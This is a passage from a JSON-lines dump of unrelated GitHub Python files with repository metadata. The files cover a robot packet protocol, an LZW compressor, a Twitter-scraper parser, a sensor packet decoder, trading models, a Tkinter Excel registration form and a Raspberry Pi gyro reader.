identifier\")),\n ('value', UInt16(0, \"Value [0x0 - 0x3FF - 0x7FF]\")),\n )\n\n\n\n\nclass RobotInit(BasePacket):\n\n TYPE = 72\n\n\n# Simulator\n\n\nclass SimulatorData(BasePacket):\n\n TYPE = 150\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('leds', UInt8(0, \"Dockstar leds status\")),\n )\n\n\n\n\nclass SimulatorClearGraphMapZones(BasePacket):\n\n TYPE = 151\n LOGVIEW_DEFAULT_ENABLED = False\n\n\n\n\nclass SimulatorAddGraphMapZone(BasePacket):\n\n TYPE = 152\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('id' , UInt8(0, \"Zone id\")),\n ('points', List (63, Float(0.0), [], \"Points\")),\n )\n\n\n\n\nclass SimulatorEnableGraphMapZone(BasePacket):\n\n TYPE = 153\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('id' , UInt8(0, \"Zone id\")),\n ('enabled', Bool (True, \"Zone status\")),\n )\n\n\n\nclass SimulatorMoveGraphMapZone(BasePacket):\n\n TYPE = 154\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('id' , UInt8(0, \"Zone id\")),\n ('dx' , Float(0.0, \"X coordinate\")),\n ('dy' , Float(0.0, \"Y coordinate\")),\n )\n\n\n\n\nclass SimulatorClearGraphMapEdges(BasePacket):\n\n TYPE = 155\n LOGVIEW_DEFAULT_ENABLED = False\n\n\n\n\nclass SimulatorGraphMapEdges(BasePacket):\n\n TYPE = 156\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('points', List(63, Float(0.0), [], \"Edges\")),\n )\n\n\n\n\nclass SimulatorGraphMapRoute(BasePacket):\n\n TYPE = 157\n LOGVIEW_DEFAULT_ENABLED = False\n DEFINITION = (\n ('points', List(63, Float(0.0), [], \"Edges\")),\n )\n\n\n# Interbot\n\n\nclass InterbotPosition(BasePacket):\n\n TYPE = 201\n\n DEFINITION = (\n ('pose', Pose(\"Other robot pose\")),\n ('is_moving', Bool(False, \"Is the robot moving or not\")),\n ('destination', Pose(\"Other robot destination\")),\n )\n\n\n\n\nclass InterbotGoalStatus(BasePacket):\n\n TYPE = 202\n\n DEFINITION = (\n ('goal_identifier', String(32, \"\", \"Goal identifier\")),\n ('goal_status' , UInt8 (0, \"Goal status\")),\n )\n\n\nclass InterbotGeneric(BasePacket):\n\n TYPE = 203\n\n DEFINITION = (\n ('data', String(255, \"\", \"Data\")),\n )\n\n\n# Internal\n\n\nclass InterbotConnected(BasePacket):\n\n TYPE = 230\n\n\n\n\nclass InterbotDisconnected(BasePacket):\n\n TYPE = 231\n\n\n\n\nclass OpponentPosition(BasePacket):\n\n TYPE = 232\n\n DEFINITION = (\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n ('distance' , UEnum8(OPPONENT_DISTANCE, OPPONENT_DISTANCE_NEAR)),\n ('x' , Float(0.0, \"Opponent estimated X coordinate\")),\n ('y' , Float(0.0, \"Opponent estimated Y coordinate\")),\n )\n\n\n\n\nclass OpponentDetected(BasePacket):\n\n TYPE = 233\n\n DEFINITION = (\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n ('direction', UEnum8(DIRECTION, DIRECTION_FORWARD)),\n ('x' , Float(0.0, \"Opponent estimated X coordinate\")),\n ('y' , Float(0.0, \"Opponent estimated Y coordinate\")),\n )\n\n\n\n\nclass OpponentDisappeared(BasePacket):\n\n TYPE = 234\n\n DEFINITION = (\n ('robot' , UEnum8(OPPONENT_ROBOT, OPPONENT_ROBOT_MAIN)),\n ('direction', UEnum8(DIRECTION, DIRECTION_FORWARD)),\n )\n\n\n\n\nclass RelayToggle(BasePacket):\n\n TYPE = 235\n\n DEFINITION = (\n ('id' , UInt8 (0, \"Relay ID\")),\n ('action' , UEnum8(ACTION, ACTION_OFF)),\n ('toggle_count', Int8 (0, \"Number of toggles before 'action'. 0 = release\")),\n )\n\n\n################################################################################\n# Packets lookup setup\n\n\nPACKETS_BY_NAME = {}\nPACKETS_BY_TYPE = {}\nPACKETS_LIST = []\n\n\nfor (item_name, item_type) in inspect.getmembers(sys.modules[__name__]):\n if inspect.isclass(item_type) and issubclass(item_type, BasePacket) and item_type != BasePacket:\n # Create a packet instance a first time to finish the setup\n item_type.static_init()\n assert item_name not in PACKETS_BY_NAME\n PACKETS_BY_NAME[item_name] = item_type\n assert item_type.TYPE not in PACKETS_BY_TYPE\n PACKETS_BY_TYPE[item_type.TYPE] = item_type\n PACKETS_LIST = list(PACKETS_BY_TYPE.values())\n\n\ndef create_packet(buffer):\n # TODO : when unknown packet, return a dummy class\n (packet_type,) = struct.unpack(\" None:\n \"\"\"Initialize LZW object.\n\n Args:\n raw_data (str): Raw data to compress.\n compressed_data (bytes): Compressed data to decompress.\n \"\"\"\n self.raw_data: str = raw_data\n self.raw_data_bytes: bytes = raw_data.encode(\"utf-8\")\n self.compressed_data: bytes = compressed_data\n\n def compress(self) -> bytes:\n \"\"\"Compress raw data.\n\n Returns:\n bytes: Compressed data.\n \"\"\"\n compressed = []\n start_dictionary = list(set(self.raw_data_bytes))\n dictionary: list[list[int]] = [[i] for i in start_dictionary]\n i = 0\n while i < len(self.raw_data_bytes):\n prefix_id = self.find_longest_prefix(\n dictionary,\n (self.raw_data_bytes[j] for j in range(i, len(self.raw_data_bytes))),\n )\n if prefix_id == -1:\n break\n prefix = dictionary[prefix_id]\n compressed.append(prefix_id)\n i += len(prefix)\n if i < len(self.raw_data_bytes):\n dictionary.append(prefix + [self.raw_data_bytes[i]])\n\n start_dict_bytes = bytes(start_dictionary)\n compressed_bytes = b\"\"\n for i in compressed:\n compressed_bytes += struct.pack(\">I\", i)\n start_dict_header = struct.pack(\"I\", len(start_dict_bytes))\n compressed_header = struct.pack(\"I\", len(compressed_bytes))\n return (\n start_dict_header + start_dict_bytes + compressed_header + compressed_bytes\n )\n\n def find_longest_prefix(\n self, dictionary: list[list[int]], sequence: Iterable[int]\n ) -> int:\n \"\"\"Find longest prefix in dictionary.\n\n Args:\n dictionary (list[list[int]]): Dictionary to search in.\n sequence (Iterable[int]): Sequence to search for.\n\n Returns:\n int: Index of longest prefix in dictionary.\n \"\"\"\n prefix = []\n for char in sequence:\n prefix += [char]\n if prefix in dictionary:\n continue\n return dictionary.index(prefix[:-1])\n return dictionary.index(prefix)\n\n def compress_and_set(self) -> None:\n \"\"\"Compress raw data and set compressed data.\"\"\"\n self.compressed_data = self.compress()\n\n def save_compressed(self, path: str) -> None:\n \"\"\"Save compressed data to file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"wb\") as file:\n file.write(self.compressed_data)\n\n def load_compressed(self, path: str) -> None:\n \"\"\"Load compressed data from file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"rb\") as file:\n self.compressed_data = file.read()\n\n def decompress(self) -> str:\n \"\"\"Decompress compressed data.\n\n Returns:\n str: Decompressed data.\n \"\"\"\n start_dict_size = struct.unpack(\"I\", self.compressed_data[:4])[0]\n start_dict = self.compressed_data[4 : 4 + start_dict_size]\n compressed_size = struct.unpack(\n \"I\", self.compressed_data[4 + start_dict_size : 8 + start_dict_size]\n )[0]\n compressed = []\n for i in range(8 + start_dict_size, 8 + start_dict_size + compressed_size, 4):\n compressed.append(struct.unpack(\">I\", self.compressed_data[i : i + 4])[0])\n dictionary = [[i] for i in start_dict]\n decompressed = []\n prev_i = compressed[0]\n decompressed += dictionary[prev_i]\n for i in compressed[1:]:\n if i < len(dictionary):\n dictionary.append(dictionary[prev_i] + [dictionary[i][0]])\n decompressed += dictionary[i]\n else:\n dictionary.append(dictionary[prev_i] + [dictionary[prev_i][0]])\n decompressed += dictionary[-1]\n prev_i = i\n return bytes(decompressed).decode(\"utf-8\")\n\n def decompress_and_set(self) -> None:\n \"\"\"Decompress compressed data and set raw data.\"\"\"\n self.raw_data = self.decompress()\n\n def save_decompressed(self, path: str) -> None:\n \"\"\"Save decompressed data to file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"w\", encoding=\"utf-8\") as file:\n file.write(self.raw_data)\n\n def load_raw(self, path: str) -> None:\n \"\"\"Load raw data from file.\n\n Args:\n path (str): Path to file.\n \"\"\"\n with open(path, \"r\", encoding=\"utf-8\") as file:\n self.raw_data = file.read()\n self.raw_data_bytes = self.raw_data.encode(\"utf-8\")\n","repo_name":"rhusiev-student/s2_disc_l2","sub_path":"src/lzw.py","file_name":"lzw.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74063602729","text":"from flask_restx import reqparse\n\ntwint_argument_parser = reqparse.RequestParser()\n\ntwint_argument_parser.add_argument(\n 'username',\n location='args',\n type=str,\n required=False,\n default=None,\n help='The username to make the tweets search')\n\ntwint_argument_parser.add_argument('keyword',\n location='args',\n type=str,\n required=False,\n default=None,\n help='The keyword to make tweets search')\n\ntwint_argument_parser.add_argument(\n 'limit',\n location='args',\n type=int,\n required=False,\n default=20,\n help='Number of Tweets to pull (Increments of 20)..')\ntwint_argument_parser.add_argument('likes',\n location='args',\n type=int,\n required=False,\n default=50,\n help='Number of Minimum likes ')\ntwint_argument_parser.add_argument(\n 'lang',\n location='args',\n type=str,\n required=True,\n default=None,\n help=\n \"Language of the tweet to retrieve. The language must be ISO coded. For example, English code would be 'en'.\"\n)\ntwint_argument_parser.add_argument(\n 'from_date',\n location='args',\n type=str,\n required=False,\n default=None,\n help=\n 'The start date to retrieve tweets from. The date must be in ISO 8601 format YYYY-mm-dd.'\n)\n\ntwint_argument_parser.add_argument(\n 'to_date',\n location='args',\n type=str,\n required=False,\n default=None,\n help=\n 'The end date to retrieve tweets from. The date must be in ISO 8601 format YYYY-mm-dd.'\n)","repo_name":"tobeal/pruebasTwint","sub_path":"twin/twinApi/api/twint_parsers.py","file_name":"twint_parsers.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21782768591","text":"#!/usr/bin/env python3\n# -*- mode:python; coding:utf-8 -*-\n\nimport time\nfrom datetime import datetime,timedelta\nimport syslog\nimport sys\nimport os\nimport serial\nimport struct\nimport binascii\nimport glob\nimport platform\nimport argparse\n\ndef decodeVolt(batt):\n volt = 0\n if batt <= 170:\n volt = 1950 + 5 * batt\n else:\n volt = 2800 + 10 * (batt - 170)\n return volt\n\n# Decode output of vSerOutput_Uart().\ndef parseTWELite(raw):\n if raw[0] != \":\":\n return {}\n data = binascii.unhexlify(raw[1:])\n pkt = raw[25:27]\n result = None\n\n if pkt == '10':\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,PC1,PC2,CRC\n ss10 = struct.Struct(\">IBHIBBBHHHHB\")\n parsed = ss10.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"PC1\" : parsed[9],\n \"PC2\" : parsed[10]\n }\n elif pkt == 'FE':\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,param,DIbitmap,CRC\n ssFE = struct.Struct(\">IBHIBBBHHBBB\")\n parsed = ssFE.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"param\" : parsed[9],\n \"button\" : parsed[10]\n }\n return result\n\ndef showParsm(filename, param):\n f = open(filename, \"r\")\n rx = f.readline()\n f.close()\n parsed = parseTWELite(rx)\n if param in parsed:\n print(parsed[param])\n else:\n print ('-2')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Show some values collected by TWE-Lite.\")\n parser.add_argument('-d', '--directory', nargs='?', default='/var/run/twe', help='Directory of stattus cache.')\n parser.add_argument('params', nargs=2)\n args = parser.parse_args()\n for p in args.params:\n if ':' in p:\n (name, param) = p.split(':', 2)\n filename = args.directory + os.sep + name\n if os.path.exists(filename):\n showParsm(filename, param)\n else:\n print ('-1')\n else:\n print ('-0')\n\n print(\"\\n\" + platform.system())\n sys.exit(0)\n","repo_name":"true-nature/App_DoorChecker","sub_path":"RaspberryPi/usr/local/bin/twe-show.py","file_name":"twe-show.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30820560610","text":"import pandas as pd\n\nclass Model:\n def __init__(self, name, input_checker, buy_signal, sell_signal, rows_needed, span):\n '''\n input_checker takes a dataframe representing the available data, \n and returns true if the data is the correct shape/size, false otherwise\n buy_signal takes a df and returns true if the model says to buy\n sell_signal also takes a df, but returns true if the model says to sell\n '''\n self.name = name\n self.check_input = input_checker\n self.buy_signal = buy_signal\n self.sell_signal = sell_signal\n self.rows_needed = rows_needed\n self.span = span\n\n\nclass Mean_Reversion(Model):\n def __init__(self, name, n_for_long_ma, n_for_short_ma, n_for_RSI, span='year'):\n '''\n implements a mean reversion strategy\n says buy if 1) price is higher than the 200_period_ma and 2) the 2_period_RSI is < 10\n says sell if price is lower than 10_period_ma\n '''\n self.name = name\n self.n_long_ma = n_for_long_ma\n self.n_short_ma = n_for_short_ma\n self.n_RSI = n_for_RSI\n self.expected_columns = [str(self.n_long_ma)+'_period_ma', str(self.n_short_ma)+'_period_ma', str(self.n_RSI)+'_period_RSI']\n self.rows_needed = 2\n self.span = span\n\n def check_input(df):\n cols = df.columns\n for e in self.expected_columns:\n if not e in cols: return False\n return True\n\n def buy_signal(df):\n last_row = df.iloc[-1]\n condition1 = float(last_row['close_price']) > float(last_row[self.expected_columns[0]])\n # ^price > long ma\n condition2 = float(last_row[self.expected_columns[2]]) < 10\n # ^MSI < trigger\n return condition1 and condition2\n\n def sell_signal(df):\n last_row = df.iloc[-1]\n return float(last_row['close_price']) < float(last_row[self.expected_columns[1]])\n\n self.check_input = check_input\n self.buy_signal = buy_signal\n self.sell_signal = sell_signal\n\n def save(self):\n return\n","repo_name":"rabisnath/birdwatching","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39066416666","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom function_list import *\nfrom scipy.stats import ttest_ind\nimport re\n\nfuncs = ['RosenBrock', 'Rastrigin']\n\nfor func in funcs:\n print(\"********************************************\")\n print(\"func = {} \". format(func))\n for N in [128, 256, 512, 1024, 2048]:\n print(\"_____________________________________________\")\n res_star = []\n res_ring = []\n\n link_1 = 'log/ring/' + func + '_' + str(N) + '.txt'\n link_2 = 'log/star/' + func + '_' + str(N) + '.txt'\n with open(link_1, 'r') as fi:\n for line in fi:\n m = re.search(r'(?<= - )(.*?)(?= - )',line)\n if m != None:\n res_ring.append(float(m.group(0)))\n print(\" res_ring = {}\".format(res_ring))\n print (\" \")\n with open(link_2, 'r') as fi:\n for line in fi:\n m = re.search(r'(?<= - )(.*?)(?= - )',line)\n if m != None:\n res_star.append(float(m.group(0)))\n print(\" res_start = {}\".format(res_star))\n print (\" \")\n print(\" N = {} - ttest {} \".format(N, ttest_ind(res_ring, res_star)))\n print (\" \")\n","repo_name":"PhamLeQuangNhat/Genetic_Algorithm_Learning_Projects","sub_path":"PSO/ttest.py","file_name":"ttest.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2187038574","text":"def backtracking(l, idx, tmp, order):\n if len(tmp) == l:\n order.append(list(map(int, tmp)))\n return\n \n for i in range(l):\n if str(i) not in tmp:\n backtracking(l, i+1, tmp+str(i), order)\n\n\ndef solution(k, dungeons):\n answer = 0\n order = []\n \n dungeons = sorted(dungeons, key=lambda x: (x[0], x[1]), reverse=True)\n \n backtracking(len(dungeons), 0, \"\", order)\n \n for i in range(len(order)):\n now = k\n tmp = 0\n for j in range(len(order[i])):\n x = order[i][j]\n \n if now >= dungeons[x][0]:\n now -= dungeons[x][1]\n tmp += 1\n \n answer = max(answer, tmp)\n if answer == len(order[i]):\n break\n \n return answer","repo_name":"rloldl-c/algorithm","sub_path":"프로그래머스/lv2/87946. 피로도/피로도.py","file_name":"피로도.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27672370262","text":"from tkinter import *\nfrom openpyxl import *\nfrom tkinter import messagebox\nfrom xlrd import *\n# import setuptools\n# import distutils\n# import site\n\nworksheet=load_workbook('F:\\workspace_python\\Geeks For Geeks\\excel1.xlsx')\nsheet=worksheet.active\n\ndef clear():\n name_field.delete(0,END)\n guardian_field.delete(0,END)\n join_date_field.delete(0,END)\n end_date_field.delete(0,END)\n contact_field.delete(0,END)\n address_field.delete(0,END)\n age_field.delete(0,END)\n\n\ndef insert():\n if ( name_field.get()==\"\" or \n guardian_field.get()==\"\" or \n join_date_field.get()==\"\" or \n end_date_field.get()==\"\" or \n contact_field.get()==\"\" or \n address_field==\"\" or \n age_field.get()==\"\" ) :\n print(\"Enter valid details\")\n messagebox.showinfo(\"information\",\"Enter all the details\")\n\n else:\n current_row=sheet.max_row\n current_column=sheet.max_column\n\n sheet.cell(row=current_row+1,column=1).value=name_field.get()\n sheet.cell(row=current_row+1,column=2).value=guardian_field.get()\n sheet.cell(row=current_row+1,column=3).value=join_date_field.get()\n sheet.cell(row=current_row+1,column=4).value=end_date_field.get()\n sheet.cell(row=current_row+1,column=5).value=contact_field.get()\n sheet.cell(row=current_row+1,column=6).value=address_field.get()\n sheet.cell(row=current_row+1,column=7).value=age_field.get()\n if radio_value.get()==1:\n sheet.cell(row=current_row+1,column=8).value=\"1 month\"\n elif radio_value.get()==2:\n sheet.cell(row=current_row+1,column=8).value=\"3 month\"\n elif radio_value.get()==3:\n sheet.cell(row=current_row+1,column=8).value=\"6 month\"\n else:\n sheet.cell(row=current_row+1,column=8).value=\"12 months\"\n \n worksheet.save('F:\\workspace_python\\Geeks For Geeks\\excel1.xlsx')\n\n name_field.focus_set()\n\n clear()\n\n\ndef show():\n \n #new window class declaration\n check_class=Tk()\n check_class.geometry(\"400x400\")\n status_var=StringVar()\n\n check_label1=Label(check_class,text=\"Details\",font=\"Aerial 15 underline\")\n check_label1.grid(row=0,column=1)\n\n search_field=Entry(check_class)\n\n # status_label=Label(check_class,textvariable=search_field.get())\n \n \n # book=open_workbook('F:\\workspace_python\\Geeks For Geeks\\excel1.xlsx')\n \n # for i in book.sheets:\n # for rowidx in range(i.nrows):\n # row\n \ndef excel():\n sheet.column_dimensions['A'].width = 20\n sheet.column_dimensions['B'].width = 20\n sheet.column_dimensions['C'].width = 20\n sheet.column_dimensions['D'].width = 20\n sheet.column_dimensions['E'].width = 20\n sheet.column_dimensions['F'].width = 40\n sheet.column_dimensions['G'].width = 10\n sheet.column_dimensions['H'].width = 10\n\n sheet.cell(row=1,column=1).value=\"Name\"\n sheet.cell(row=1,column=2).value=\"Guardian\"\n sheet.cell(row=1,column=3).value=\"join_date\"\n sheet.cell(row=1,column=4).value=\"end_date\"\n sheet.cell(row=1,column=5).value=\"contact\"\n sheet.cell(row=1,column=6).value=\"address\"\n sheet.cell(row=1,column=7).value=\"age\"\n sheet.cell(row=1,column=8).value=\"time\"\n\ndef focus2(Event):\n guardian_field.focus_set()\ndef focus3(Event):\n join_date_field.focus_set()\ndef focus4(Event):\n end_date_field.focus_set()\ndef focus5(Event):\n contact_field.focus_set()\ndef focus6(Event):\n address_field.focus_set()\ndef focus7(Event):\n age_field.focus_set()\n\n\nif __name__ == \"__main__\":\n \n main_class=Tk()\n main_class.title(\"Planet-X Registration form\")\n main_class.geometry(\"600x400\")\n radio_value=IntVar()\n header=Label(main_class,text=\"Enter Details here\",font=\"verdana 17 underline\")\n\n header1=Label(main_class,text=\"Membership for\",font=\"Verdana 12 underline\")\n\n#Radio buttons\n time_button1=Radiobutton(main_class,text=\"1 Month\",padx=20,variable=radio_value,value=1)\n time_button2=Radiobutton(main_class,text=\"3 Months\",padx=20,variable=radio_value,value=2)\n time_button3=Radiobutton(main_class,text=\"6 Months\",padx=20,variable=radio_value,value=3)\n time_button4=Radiobutton(main_class,text=\"12 Months\",padx=20,variable=radio_value,value=4)\n\n#Labels of UI\n name=Label(main_class,text=\"Full Name\")\n guardian=Label(main_class,text=\"Father's Name/ Husband's Name\")\n join_date=Label(main_class,text=\"Joining Date\") \n end_date=Label(main_class,text=\"End Date\")\n contact=Label(main_class,text=\"Contact No.\")\n address=Label(main_class,text=\"Address\")\n age=Label(main_class,text=\"Age\")\n\n#Placements of the Header \n header.grid(row=0,column=1)\n header1.grid(row=1,column=0)\n\n#Placements of the radio buttons \n time_button1.grid(row=2,column=0)\n time_button2.grid(row=2,column=1)\n time_button3.grid(row=3,column=0)\n time_button4.grid(row=3,column=1)\n\n#Placements of the labels\n name.grid(row=5,column=0)\n guardian.grid(row=6,column=0)\n join_date.grid(row=7,column=0)\n end_date.grid(row=8,column=0)\n contact.grid(row=9,column=0)\n address.grid(row=10,column=0)\n age.grid(row=11,column=0)\n\n#input Field\n name_field=Entry(main_class)\n guardian_field=Entry(main_class)\n join_date_field=Entry(main_class)\n end_date_field=Entry(main_class)\n contact_field=Entry(main_class)\n address_field=Entry(main_class)\n age_field=Entry(main_class)\n\n#Placements of input fields\n name_field.grid(row=5,column=1,ipadx=\"60\")\n guardian_field.grid(row=6,column=1,ipadx=\"60\")\n join_date_field.grid(row=7,column=1,ipadx=\"60\")\n end_date_field.grid(row=8,column=1,ipadx=\"60\")\n contact_field.grid(row=9,column=1,ipadx=\"60\")\n address_field.grid(row=10,column=1,ipadx=\"60\")\n age_field.grid(row=11,column=1,ipadx=\"60\")\n\n#Return of the Focus\n name_field.bind(\"\",focus2)\n guardian_field.bind(\"\",focus3)\n join_date_field.bind(\"\",focus4)\n end_date_field.bind(\"\",focus5)\n contact_field.bind(\"\",focus6)\n address_field.bind(\"\",focus7)\n\n#Calling excel func \n excel()\n\n#Buttons declarations\n submit_button=Button(main_class,text=\"Submit\",command=insert )\n submit_button.grid(row=15,column=1)\n\n check_status=Button(main_class,text=\"Check member\",command=show)\n check_status.grid(row=17,column=0)\n\n main_class.mainloop()\n# import tkinter as tk\n\n# root = tk.Tk()\n\n# v = tk.IntVar()\n\n# tk.Label(root, \n# text=\"\"\"Choose a \n# programming language:\"\"\",\n# justify = tk.LEFT,\n# padx = 20).pack()\n# tk.Radiobutton(root, \n# text=\"Python\",\n# padx = 20, \n# variable=v, \n# value=1).pack(anchor=tk.W)\n# tk.Radiobutton(root, \n# text=\"Perl\",\n# padx = 20, \n# variable=v, \n# value=2).pack(anchor=tk.W)\n\n# root.mainloop()","repo_name":"darshantak/Tkinter-GUI","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13180100172","text":"# -*- coding: UTF-8 -*-\n#!/usr/bin/env python\n\n#------------------------------------------------------------------------------\n# Name: Analyseur (or Analizer in English)\n# Purpose: Analyzes the offers published on GeoRezo, extracts and formats\n# interesting informations: contracts types, date, etc.\n#\n# Authors: pvernier (https://github.com/pvernier)\n# & Guts (https://github.com/Guts)\n#\n# Python: 3.4.x\n# Created: 01/05/2014\n# Updated: 03/11/2014\n#\n# Licence: GPL 3\n#------------------------------------------------------------------------------\n\n###############################################################################\n########### Libraries #############\n###################################\n\n# Standard library\nfrom os import path, environ\nimport sqlite3\nimport sys\n\nimport json\n\n# Django specifics\nsys.path.append('/home/pvernier/code/python/elpaso')\nenviron['DJANGO_SETTINGS_MODULE'] = 'elpaso.settings'\n# from jobs.models import Technos_Types, Semantic_Global\n# from django.db.models import Sum\n\n#### SQLITE LIB\ndb_path = u\"../../elpaso.sqlite\"\n\n# connection to the DB\ndb = path.abspath(db_path)\nconn = sqlite3.connect(db)\nc = conn.cursor()\n\n\nc.execute('SELECT occurrences, word, first_time, last_time \\\n FROM jobs_semantic_global \\\n ORDER BY occurrences DESC\\\n LIMIT 100')\nsemantic_frek = c.fetchall()\nratio = max([t[0] for t in sorted(semantic_frek, reverse=True)])/50\nprint(ratio)\nprint(t[0]/ratio)\n\nfrequences = [{'word': t[1], 'dim': t[0]/ratio, 'occurs': t[0], 'firstime': t[2], 'lastime': t[3]}\n for t in sorted(semantic_frek, reverse=True)]\n\nwith open('/home/pvernier/code/python/elpaso/static/json/mots_geomatique.json', 'w') as output:\n json.dump(frequences, output)\n\n#### DJANGO LIB\n# test_query = Semantic_Global.objects.values('occurrences', 'word', 'first_time', \"last_time\")\\\n# .order_by('-occurrences')[:250]\n# print(len(test_query))\n# print(test_query[1].get(\"word\"))\n\n# frequences = [{'word': item.get(\"word\"),\n# 'occurs': item.get(\"occurrences\"),\n# 'firstime': item.get(\"first_time\"),\n# 'lastime': item.get(\"last_time\")}\n# for item in test_query]\n\n# with open('/home/pvernier/code/python/elpaso/static/json/mots_geomatique_django.json', 'w') as output:\n# json.dump(frequences, output, indent=4)\n\n\n# technos_get = Technos_Types.objects.aggregate(Sum('proprietaire'),\n# Sum('libre'),\n# Sum('sgbd'),\n# Sum('programmation'),\n# Sum('web'),\n# Sum('cao_dao'),\n# Sum('teledec'))\n\n# technos_totaux = [{'label': item[0:-5],\n# 'value': technos_get.get(item)}\n# for item in technos_get]\n\n# with open('/home/pvernier/code/python/elpaso/static/json/technos_global.json', 'w') as output:\n# json.dump(technos_totaux, output)\n\n","repo_name":"anacaona83/elpaso","sub_path":"utils/modules/test_serializer_semantic.py","file_name":"test_serializer_semantic.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32230768944","text":"import WebcamModule as wM\nimport DataCollectionModule as dcM\ndireccion = 13\nimport cv2\nimport RPi.GPIO as GPIO # Import Raspberry Pi GPIO library\nGPIO.setwarnings(False) # Ignore warning for now\nGPIO.setmode(GPIO.BOARD) # Use physical pin numbering\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Set pin 19 to be an input pin and set initial value to be pulled low (off)\nfrom time import sleep\n\n#++++++++++++++++++++++INICIO DEL CODIGO DEL GIRO SENSOR\nimport smbus\nimport math\nimport time\n\nclass MPU:\n \n def __init__(self, gyro, acc, tau):\n # Class / object / constructor setup\n self.gx = None; self.gy = None; self.gz = None;\n self.ax = None; self.ay = None; self.az = None;\n\n self.gyroXcal = 0\n self.gyroYcal = 0\n self.gyroZcal = 0\n\n self.gyroRoll = 0\n self.gyroPitch = 0\n self.gyroYaw = 0\n\n self.roll = 0\n self.pitch = 0\n self.yaw = 0\n\n self.dtTimer = 0\n self.tau = tau\n\n self.gyroScaleFactor, self.gyroHex = self.gyroSensitivity(gyro)\n self.accScaleFactor, self.accHex = self.accelerometerSensitivity(acc)\n\n self.bus = smbus.SMBus(1)\n self.address = 0x68\n\n def gyroSensitivity(self, x):\n # Create dictionary with standard value of 500 deg/s\n return {\n 250: [131.0, 0x00],\n 500: [65.5, 0x08],\n 1000: [32.8, 0x10],\n 2000: [16.4, 0x18]\n }.get(x, [65.5, 0x08])\n\n def accelerometerSensitivity(self, x):\n # Create dictionary with standard value of 4 g\n return {\n 2: [16384.0, 0x00],\n 4: [8192.0, 0x08],\n 8: [4096.0, 0x10],\n 16: [2048.0, 0x18]\n }.get(x,[8192.0, 0x08])\n\n def setUp(self):\n # Activate the MPU-6050\n self.bus.write_byte_data(self.address, 0x6B, 0x00)\n\n # Configure the accelerometer\n self.bus.write_byte_data(self.address, 0x1C, self.accHex)\n\n # Configure the gyro\n self.bus.write_byte_data(self.address, 0x1B, self.gyroHex)\n\n # Display message to user\n print(\"MPU set up:\")\n print('\\tAccelerometer: ' + str(self.accHex) + ' ' + str(self.accScaleFactor))\n print('\\tGyro: ' + str(self.gyroHex) + ' ' + str(self.gyroScaleFactor) + \"\\n\")\n time.sleep(2)\n\n def eightBit2sixteenBit(self, reg):\n # Reads high and low 8 bit values and shifts them into 16 bit\n h = self.bus.read_byte_data(self.address, reg)\n l = self.bus.read_byte_data(self.address, reg+1)\n val = (h << 8) + l\n\n # Make 16 bit unsigned value to signed value (0 to 65535) to (-32768 to +32767)\n if (val >= 0x8000):\n return -((65535 - val) + 1)\n else:\n return val\n\n def getRawData(self):\n self.gx = self.eightBit2sixteenBit(0x43)\n self.gy = self.eightBit2sixteenBit(0x45)\n self.gz = self.eightBit2sixteenBit(0x47)\n\n self.ax = self.eightBit2sixteenBit(0x3B)\n self.ay = self.eightBit2sixteenBit(0x3D)\n self.az = self.eightBit2sixteenBit(0x3F)\n\n def calibrateGyro(self, N):\n # Display message\n print(\"Calibrating gyro with \" + str(N) + \" points. Do not move!\")\n\n # Take N readings for each coordinate and add to itself\n for ii in range(N):\n self.getRawData()\n self.gyroXcal += self.gx\n self.gyroYcal += self.gy\n self.gyroZcal += self.gz\n\n # Find average offset value\n self.gyroXcal /= 